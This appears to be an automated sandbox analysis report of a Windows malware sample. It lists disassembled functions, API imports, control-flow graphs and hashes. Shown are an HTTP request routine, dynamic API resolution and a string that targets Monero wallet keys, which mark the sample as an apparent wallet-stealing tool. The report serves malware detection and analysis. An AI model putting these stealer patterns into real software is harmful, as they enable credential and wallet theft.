                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: b162ac0689d8668918082ea20788c774ab10a604d44779b9b1ca5e96541eb42b
                      • Instruction ID: 5fcb03a7134cbde642f41efc0eee52eb72cc67e96dfe4576f35076be03ec4194
                      • Opcode Fuzzy Hash: b162ac0689d8668918082ea20788c774ab10a604d44779b9b1ca5e96541eb42b
                      • Instruction Fuzzy Hash: AC4129246C6A8C6AE764BFAFCCC1FBD77575F42FCEF509044AA20522C2C7B8650059E5
                      Function 001C4880 Relevance: 32.0, APIs: 11, Strings: 7, Instructions: 479networkstringfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 801 1c4880-1c4942 call 1da7a0 call 1c47b0 call 1da740 * 5 InternetOpenA StrCmpCA 816 1c494b-1c494f 801->816 817 1c4944 801->817 818 1c4ecb-1c4ef3 InternetCloseHandle call 1daad0 call 1c9ac0 816->818 819 1c4955-1c4acd call 1d8b60 call 1da920 call 1da8a0 call 1da800 * 2 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da920 call 1da8a0 call 1da800 * 2 InternetConnectA 816->819 817->816 829 1c4ef5-1c4f2d call 1da820 call 1da9b0 call 1da8a0 call 1da800 818->829 830 1c4f32-1c4fa2 call 1d8990 * 2 call 1da7a0 call 1da800 * 8 818->830 819->818 905 1c4ad3-1c4ad7 819->905 829->830 906 1c4ad9-1c4ae3 905->906 907 1c4ae5 905->907 908 1c4aef-1c4b22 HttpOpenRequestA 906->908 907->908 909 1c4ebe-1c4ec5 InternetCloseHandle 908->909 910 1c4b28-1c4e28 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da740 call 1da920 * 2 call 1da8a0 call 1da800 * 2 call 1daad0 lstrlen call 1daad0 * 2 lstrlen call 1daad0 HttpSendRequestA 908->910 909->818 1021 1c4e32-1c4e5c InternetReadFile 910->1021 1022 1c4e5e-1c4e65 1021->1022 1023 1c4e67-1c4eb9 InternetCloseHandle call 1da800 1021->1023 1022->1023 1024 1c4e69-1c4ea7 call 1da9b0 call 1da8a0 call 1da800 1022->1024 1023->909 1024->1021
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C4915
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C4ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001E0DDB,00000000,?,?,00000000,?,",00000000,?,00E3EA88), ref: 001C4DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C4E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C4E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C4E49
                      • InternetCloseHandle.WININET(00000000), ref: 001C4EAD
                      • InternetCloseHandle.WININET(00000000), ref: 001C4EC5
                      • HttpOpenRequestA.WININET(00000000,00E3E948,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C4B15
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • InternetCloseHandle.WININET(00000000), ref: 001C4ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$($------$------$------$H
                      • API String ID: 460715078-3550990314
                      • Opcode ID: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                      • Instruction ID: e356788a342f2a02b2b39553800bcb82e6da6e0433d1307a7266470fe4d75db2
                      • Opcode Fuzzy Hash: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                      • Instruction Fuzzy Hash: 74121171910158AADB15EB90DDA2FEEB338BF24301F90419AB50673191EF706F49CF66
                      Function 001D7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                      • Instruction ID: 68b5c14631a8a3b8f0d653a7b51b2a28cde63d99b743189dad970cc9c3fbd47f
                      • Opcode Fuzzy Hash: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                      • Instruction Fuzzy Hash: AFF04FB2944208ABC714DF98DD49BAEBBB8EB05711F10426AFA05A3780C77455048BA1
                      Function 001C1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 102c24742ab15010738fcf705b4a701a8f0b3f33881cf78cf4e1ac17c9e0955c
                      • Instruction ID: a074f297f9e17dbef0ae503ffbcba7568757581574ad3fa8a2b461c5ddf6f264
                      • Opcode Fuzzy Hash: 102c24742ab15010738fcf705b4a701a8f0b3f33881cf78cf4e1ac17c9e0955c
                      • Instruction Fuzzy Hash: DAD05E7490030CDBCB00DFE0D949AEDBB78FB08311F000568DD0573340EB309491CAAA
                      Function 001D9C10 Relevance: 224.7, APIs: 112, Strings: 16, Instructions: 684libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 1d9c10-1d9c1a 634 1da036-1da0ca LoadLibraryA * 8 633->634 635 1d9c20-1da031 GetProcAddress * 43 633->635 636 1da0cc-1da141 GetProcAddress * 5 634->636 637 1da146-1da14d 634->637 635->634 636->637 638 1da216-1da21d 637->638 639 1da153-1da211 GetProcAddress * 8 637->639 640 1da21f-1da293 GetProcAddress * 5 638->640 641 1da298-1da29f 638->641 639->638 640->641 642 1da2a5-1da332 GetProcAddress * 6 641->642 643 1da337-1da33e 641->643 642->643 644 1da41f-1da426 643->644 645 1da344-1da41a GetProcAddress * 9 643->645 646 1da428-1da49d GetProcAddress * 5 644->646 647 1da4a2-1da4a9 644->647 645->644 646->647 648 1da4dc-1da4e3 647->648 649 1da4ab-1da4d7 GetProcAddress * 2 647->649 650 1da515-1da51c 648->650 651 1da4e5-1da510 GetProcAddress * 2 648->651 649->648 652 1da612-1da619 650->652 653 1da522-1da60d GetProcAddress * 10 650->653 651->650 654 1da67d-1da684 652->654 655 1da61b-1da678 GetProcAddress * 4 652->655 653->652 656 1da69e-1da6a5 654->656 657 1da686-1da699 GetProcAddress 654->657 655->654 658 1da708-1da709 656->658 659 1da6a7-1da703 GetProcAddress * 4 656->659 657->656 659->658
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,00E25990), ref: 001D9C2D
                      • GetProcAddress.KERNEL32(74DD0000,00E25690), ref: 001D9C45
                      • GetProcAddress.KERNEL32(74DD0000,00E39568), ref: 001D9C5E
                      • GetProcAddress.KERNEL32(74DD0000,00E39598), ref: 001D9C76
                      • GetProcAddress.KERNEL32(74DD0000,00E39628), ref: 001D9C8E
                      • GetProcAddress.KERNEL32(74DD0000,00E395E0), ref: 001D9CA7
                      • GetProcAddress.KERNEL32(74DD0000,00E2BB88), ref: 001D9CBF
                      • GetProcAddress.KERNEL32(74DD0000,00E3D480), ref: 001D9CD7
                      • GetProcAddress.KERNEL32(74DD0000,00E3D570), ref: 001D9CF0
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4F8), ref: 001D9D08
                      • GetProcAddress.KERNEL32(74DD0000,00E3D420), ref: 001D9D20
                      • GetProcAddress.KERNEL32(74DD0000,00E259B0), ref: 001D9D39
                      • GetProcAddress.KERNEL32(74DD0000,00E256D0), ref: 001D9D51
                      • GetProcAddress.KERNEL32(74DD0000,00E25610), ref: 001D9D69
                      • GetProcAddress.KERNEL32(74DD0000,00E257D0), ref: 001D9D82
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4B0), ref: 001D9D9A
                      • GetProcAddress.KERNEL32(74DD0000,00E3D468), ref: 001D9DB2
                      • GetProcAddress.KERNEL32(74DD0000,00E2B958), ref: 001D9DCB
                      • GetProcAddress.KERNEL32(74DD0000,00E25630), ref: 001D9DE3
                      • GetProcAddress.KERNEL32(74DD0000,00E3D540), ref: 001D9DFB
                      • GetProcAddress.KERNEL32(74DD0000,00E3D450), ref: 001D9E14
                      • GetProcAddress.KERNEL32(74DD0000,00E3D510), ref: 001D9E2C
                      • GetProcAddress.KERNEL32(74DD0000,00E3D3D8), ref: 001D9E44
                      • GetProcAddress.KERNEL32(74DD0000,00E25830), ref: 001D9E5D
                      • GetProcAddress.KERNEL32(74DD0000,00E3D498), ref: 001D9E75
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4C8), ref: 001D9E8D
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4E0), ref: 001D9EA6
                      • GetProcAddress.KERNEL32(74DD0000,00E3D528), ref: 001D9EBE
                      • GetProcAddress.KERNEL32(74DD0000,00E3D558), ref: 001D9ED6
                      • GetProcAddress.KERNEL32(74DD0000,00E3D588), ref: 001D9EEF
                      • GetProcAddress.KERNEL32(74DD0000,00E3D3F0), ref: 001D9F07
                      • GetProcAddress.KERNEL32(74DD0000,00E3D408), ref: 001D9F1F
                      • GetProcAddress.KERNEL32(74DD0000,00E3D438), ref: 001D9F38
                      • GetProcAddress.KERNEL32(74DD0000,00E3A7C0), ref: 001D9F50
                      • GetProcAddress.KERNEL32(74DD0000,00E3CFA0), ref: 001D9F68
                      • GetProcAddress.KERNEL32(74DD0000,00E3D018), ref: 001D9F81
                      • GetProcAddress.KERNEL32(74DD0000,00E25650), ref: 001D9F99
                      • GetProcAddress.KERNEL32(74DD0000,00E3D060), ref: 001D9FB1
                      • GetProcAddress.KERNEL32(74DD0000,00E252B0), ref: 001D9FCA
                      • GetProcAddress.KERNEL32(74DD0000,00E3CE50), ref: 001D9FE2
                      • GetProcAddress.KERNEL32(74DD0000,00E3CF58), ref: 001D9FFA
                      • GetProcAddress.KERNEL32(74DD0000,00E25530), ref: 001DA013
                      • GetProcAddress.KERNEL32(74DD0000,00E25290), ref: 001DA02B
                      • LoadLibraryA.KERNEL32(00E3CE80,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA03D
                      • LoadLibraryA.KERNEL32(00E3CF88,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA04E
                      • LoadLibraryA.KERNEL32(00E3CFE8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA060
                      • LoadLibraryA.KERNEL32(00E3CE98,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA072
                      • LoadLibraryA.KERNEL32(00E3D078,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA083
                      • LoadLibraryA.KERNEL32(00E3CFD0,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA095
                      • LoadLibraryA.KERNEL32(00E3D090,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0A7
                      • LoadLibraryA.KERNEL32(00E3CFB8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0B8
                      • GetProcAddress.KERNEL32(75290000,00E25410), ref: 001DA0DA
                      • GetProcAddress.KERNEL32(75290000,00E3CEB0), ref: 001DA0F2
                      • GetProcAddress.KERNEL32(75290000,00E38F80), ref: 001DA10A
                      • GetProcAddress.KERNEL32(75290000,00E3CF70), ref: 001DA123
                      • GetProcAddress.KERNEL32(75290000,00E252D0), ref: 001DA13B
                      • GetProcAddress.KERNEL32(6FD40000,00E2BC28), ref: 001DA160
                      • GetProcAddress.KERNEL32(6FD40000,00E25450), ref: 001DA179
                      • GetProcAddress.KERNEL32(6FD40000,00E2BA20), ref: 001DA191
                      • GetProcAddress.KERNEL32(6FD40000,00E3CE20), ref: 001DA1A9
                      • GetProcAddress.KERNEL32(6FD40000,00E3D0A8), ref: 001DA1C2
                      • GetProcAddress.KERNEL32(6FD40000,00E25230), ref: 001DA1DA
                      • GetProcAddress.KERNEL32(6FD40000,00E25330), ref: 001DA1F2
                      • GetProcAddress.KERNEL32(6FD40000,00E3D030), ref: 001DA20B
                      • GetProcAddress.KERNEL32(752C0000,00E253D0), ref: 001DA22C
                      • GetProcAddress.KERNEL32(752C0000,00E25490), ref: 001DA244
                      • GetProcAddress.KERNEL32(752C0000,00E3D000), ref: 001DA25D
                      • GetProcAddress.KERNEL32(752C0000,00E3CDD8), ref: 001DA275
                      • GetProcAddress.KERNEL32(752C0000,00E25270), ref: 001DA28D
                      • GetProcAddress.KERNEL32(74EC0000,00E2B908), ref: 001DA2B3
                      • GetProcAddress.KERNEL32(74EC0000,00E2B868), ref: 001DA2CB
                      • GetProcAddress.KERNEL32(74EC0000,00E3CE38), ref: 001DA2E3
                      • GetProcAddress.KERNEL32(74EC0000,00E25350), ref: 001DA2FC
                      • GetProcAddress.KERNEL32(74EC0000,00E252F0), ref: 001DA314
                      • GetProcAddress.KERNEL32(74EC0000,00E2BC00), ref: 001DA32C
                      • GetProcAddress.KERNEL32(75BD0000,00E3D0C0), ref: 001DA352
                      • GetProcAddress.KERNEL32(75BD0000,00E254B0), ref: 001DA36A
                      • GetProcAddress.KERNEL32(75BD0000,00E38EF0), ref: 001DA382
                      • GetProcAddress.KERNEL32(75BD0000,00E3D048), ref: 001DA39B
                      • GetProcAddress.KERNEL32(75BD0000,00E3CDF0), ref: 001DA3B3
                      • GetProcAddress.KERNEL32(75BD0000,00E253F0), ref: 001DA3CB
                      • GetProcAddress.KERNEL32(75BD0000,00E254D0), ref: 001DA3E4
                      • GetProcAddress.KERNEL32(75BD0000,00E3CE08), ref: 001DA3FC
                      • GetProcAddress.KERNEL32(75BD0000,00E3CE68), ref: 001DA414
                      • GetProcAddress.KERNEL32(75A70000,00E25370), ref: 001DA436
                      • GetProcAddress.KERNEL32(75A70000,00E3CEC8), ref: 001DA44E
                      • GetProcAddress.KERNEL32(75A70000,00E3CEE0), ref: 001DA466
                      • GetProcAddress.KERNEL32(75A70000,00E3CEF8), ref: 001DA47F
                      • GetProcAddress.KERNEL32(75A70000,00E3CF10), ref: 001DA497
                      • GetProcAddress.KERNEL32(75450000,00E25310), ref: 001DA4B8
                      • GetProcAddress.KERNEL32(75450000,00E25390), ref: 001DA4D1
                      • GetProcAddress.KERNEL32(75DA0000,00E25430), ref: 001DA4F2
                      • GetProcAddress.KERNEL32(75DA0000,00E3CF28), ref: 001DA50A
                      • GetProcAddress.KERNEL32(6F070000,00E253B0), ref: 001DA530
                      • GetProcAddress.KERNEL32(6F070000,00E255F0), ref: 001DA548
                      • GetProcAddress.KERNEL32(6F070000,00E25470), ref: 001DA560
                      • GetProcAddress.KERNEL32(6F070000,00E3CF40), ref: 001DA579
                      • GetProcAddress.KERNEL32(6F070000,00E25550), ref: 001DA591
                      • GetProcAddress.KERNEL32(6F070000,00E254F0), ref: 001DA5A9
                      • GetProcAddress.KERNEL32(6F070000,00E25510), ref: 001DA5C2
                      • GetProcAddress.KERNEL32(6F070000,00E25570), ref: 001DA5DA
                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 001DA5F1
                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 001DA607
                      • GetProcAddress.KERNEL32(75AF0000,00E3D300), ref: 001DA629
                      • GetProcAddress.KERNEL32(75AF0000,00E38FF0), ref: 001DA641
                      • GetProcAddress.KERNEL32(75AF0000,00E3D330), ref: 001DA659
                      • GetProcAddress.KERNEL32(75AF0000,00E3D168), ref: 001DA672
                      • GetProcAddress.KERNEL32(75D90000,00E255B0), ref: 001DA693
                      • GetProcAddress.KERNEL32(6E330000,00E3D240), ref: 001DA6B4
                      • GetProcAddress.KERNEL32(6E330000,00E25590), ref: 001DA6CD
                      • GetProcAddress.KERNEL32(6E330000,00E3D1C8), ref: 001DA6E5
                      • GetProcAddress.KERNEL32(6E330000,00E3D2E8), ref: 001DA6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
